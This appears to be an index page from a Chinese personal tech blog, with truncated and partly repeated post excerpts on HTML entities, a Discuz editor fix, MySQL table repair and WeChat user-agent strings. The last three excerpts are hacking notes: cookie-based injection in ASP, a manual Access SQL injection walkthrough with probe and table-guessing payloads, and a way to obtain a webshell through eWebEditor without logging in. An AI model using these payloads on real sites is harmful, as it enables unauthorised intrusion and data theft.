HTML字符实体,转义字符串,&#数字;编码
[ 2013-06-14 11:13:52 | 作者: admin ]
为什么要用转义字符串?
HTML中<,>,&等有特殊含义(<,>,用于链接签,&用于转义),不能直接使用。这些符号是不显示在我们最终看到的网页里的,那如果我们希望在网页中显示这些符号,该怎么办呢?
这就要说到HTML转义字符串(Escape Sequence)了。
转义字符串(Escape Sequence)也称字符实体(Character Entity)。在HTML中,定义转义字符串的原因有两个:第一个原因是像“<”和“>”这类符号已经用来表示HTML标签,因此就不能直接当作文本中的符号来使用。为了在HTML文档中使用这些符号,就需要定义它的转义字符串。当解释程序遇到这类字符串时就把它解释为真实的字符。在输入转义字符串时,要严格遵守字母大小写的规则。第二个原因是,有些字符在ASCII字符集中没有定义,因此需要使用转义字符串来表示。 ...
阅读全文…
阅读全文…
dz x2.5 20130426 的 html贴无法切换可视化编辑器问题
[ 2013-06-11 21:45:31 | 作者: admin ]
http://www.discuz.net/thread-3094666-2-1.html
是discuz程序员搞错了,查找
/source/include/post/post_editpost.php
就可以了
是discuz程序员搞错了,查找
/source/include/post/post_editpost.php
if($htmloncheck) {//当选择html的时候纯文本是没有的
$editor['editormode'] = 0;
$editor['allowswitcheditor'] = 0;//此值怎么会是0能,
}
改为$editor['editormode'] = 0;
$editor['allowswitcheditor'] = 0;//此值怎么会是0能,
}
if($htmloncheck) {//当选择html的时候纯文本显示
$editor['editormode'] = 0;
$editor['allowswitcheditor'] = 1;//所以改为1
}
$editor['editormode'] = 0;
$editor['allowswitcheditor'] = 1;//所以改为1
}
就可以了
91助手对w700的一键root
[ 2013-06-09 09:19:41 | 作者: admin ]
老版可以 91助手 for Android v1.7.22.298 测试可以
新版本没有这个功能了
新版本没有这个功能了
mysql数据库表的修复问题
[ 2013-06-07 16:41:04 | 作者: admin ]
baidu搜索,说用PHPmyadmiN修复一下损坏的表,照做了,问题没解决,
无奈区了官方找答案,最后终于解决了
如果您的服务器是独立主机强烈建议使用命令行方式进行修复:
修复前将mysql服务停止。
如果是Win主机,打开命令行方式,然后进入到mysql的/bin目录。
执行myisamchk -r d:\mysql\data\discuz\*.MYI
其中d:\mysql\data\discuz\换成您的数据库所在路径。
如果是类Unix主机,直接使用myisamchk -r 数据库目录\*.MYI 即可。
其中我用第二种办法时,在phpmyadmin中显示此表正在使用中,phpmyadmin修复操作无法对此表进行修复操作。那就用第三种办法了,朋友服务器用的是win服务器主机,于是打开命令行,首先停止mysql服务:net stop mysql,然后进入到mysql的bin目录,输入:myisamchk ...
阅读全文…
无奈区了官方找答案,最后终于解决了
如果您的服务器是独立主机强烈建议使用命令行方式进行修复:
修复前将mysql服务停止。
如果是Win主机,打开命令行方式,然后进入到mysql的/bin目录。
执行myisamchk -r d:\mysql\data\discuz\*.MYI
其中d:\mysql\data\discuz\换成您的数据库所在路径。
如果是类Unix主机,直接使用myisamchk -r 数据库目录\*.MYI 即可。
其中我用第二种办法时,在phpmyadmin中显示此表正在使用中,phpmyadmin修复操作无法对此表进行修复操作。那就用第三种办法了,朋友服务器用的是win服务器主机,于是打开命令行,首先停止mysql服务:net stop mysql,然后进入到mysql的bin目录,输入:myisamchk ...
阅读全文…
微信浏览器的HTTP_USER_AGENT
[ 2013-06-06 16:45:45 | 作者: admin ]
在iPhone下,返回
在Android下,返回
...
阅读全文…
Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9B176 MicroMessenger/4.3.2
在Android下,返回
Mozilla/5.0 (Linux; U; Android 2.3.6; zh-cn; GT-S5660 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 MicroMessenger/4.5.255
不难发现微信浏览器为 MicroMessenger ,并且有版本号,也可以判断手机类型为iPhone还是Android...
阅读全文…
cookie注入中转注入笔记
[ 2013-05-28 17:05:09 | 作者: admin ]
ASP脚本中,Request对象获取客户端提交数据常用的是GET和POST二种方式,同时request对象可以不通过集合来获得数据,即直接使用"request("name")"但它的效率低下,容易出错,当我们省略具体的集合
名称时,ASP是按QueryString,from,cookie,servervariable,集合的顺序来搜索的,在request对象成员中集合cookies,它的意思是"读取用户系统发送的所有cookie值,cookies是保存在客户端计算机的一
个文本文件,可以进行修改,这样一来,我们就可以使用Request.cookie方式来提交变量的值,从而利用系统的漏洞进行注入攻击.
我们首先还是来看看中网景论坛的最新版本"(CNKBBS2007)中网景论坛2007v5.0 ...
阅读全文…
access手工注入笔记
[ 2013-05-28 17:02:46 | 作者: admin ]
http://www.xxx.com/news.asp?id=6
注入点
判断是否存在注入 两次返回不一样 存在注入
http://www.xxx.com/news.asp?id=6and 1=1
http://www.xxx.com/news.asp?id=6and 1=2
判断数据库 这里可能是本地问题 没有测试出来
and (select count(*) from msysobjects)>0 (返回权限不足access数据库)
and (select count(*) from sysobjects)>0 (返回正常则为MSSQL数据库)
猜解表名(正常则存在admin,不正常则不存在)
and exists (select * from admin)
返回正确 存在admin 我们随便填写一个进去那么 返回错误 不存在这个表
现在我们来猜解字段
...
阅读全文…
注入点
判断是否存在注入 两次返回不一样 存在注入
http://www.xxx.com/news.asp?id=6and 1=1
http://www.xxx.com/news.asp?id=6and 1=2
判断数据库 这里可能是本地问题 没有测试出来
and (select count(*) from msysobjects)>0 (返回权限不足access数据库)
and (select count(*) from sysobjects)>0 (返回正常则为MSSQL数据库)
猜解表名(正常则存在admin,不正常则不存在)
and exists (select * from admin)
返回正确 存在admin 我们随便填写一个进去那么 返回错误 不存在这个表
现在我们来猜解字段
...
阅读全文…
ewebeditor不进后台拿shell的方法
[ 2013-05-28 16:59:49 | 作者: admin ]
在数据库没被删掉的情况下。(默认:/db/ewebeditor.mdb)如果没删掉的话,把数据库给Down下来。
然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件,如果有往下看。
查找到这段:
<IFRAME ID=”eWebEditor1″ SRC=”../eWebEditor/ewebeditor.asp?id=content&style=s_light” FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
把那个s_light换成你刚才看到的样式名字,然后把链接补全。
<IFRAME ID=”eWebEditor1″ SRC=www.xxx.com/eWebEditor/ewebeditor.asp?id=content&style=adminone1 ...
阅读全文…
然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件,如果有往下看。
查找到这段:
<IFRAME ID=”eWebEditor1″ SRC=”../eWebEditor/ewebeditor.asp?id=content&style=s_light” FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
把那个s_light换成你刚才看到的样式名字,然后把链接补全。
<IFRAME ID=”eWebEditor1″ SRC=www.xxx.com/eWebEditor/ewebeditor.asp?id=content&style=adminone1 ...
阅读全文…
